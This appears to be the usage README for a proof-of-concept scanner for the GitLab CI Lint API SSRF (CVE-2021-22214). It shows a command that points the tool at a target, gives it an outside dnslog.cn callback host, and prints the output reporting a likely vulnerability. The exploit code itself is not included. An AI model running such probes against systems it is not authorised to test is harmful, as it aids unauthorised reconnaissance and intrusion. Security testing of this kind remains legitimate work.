Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)
本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。
- help
$ python3 gitlab_ssrf.py
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
Example:
python3 gitlab_ssrf.py <target> <dnshost>
- use
target: 192.168.80.136
$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn
===============================================================
_____ _ _ _ _ _____ _____ _____ ______
/ ____(_) | | | | | / ____/ ____| __ \| ____|
| | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
| | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
| |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
\_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
CVE-2021-22214 Powered by r0cky Team ZionLab
===============================================================
[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录.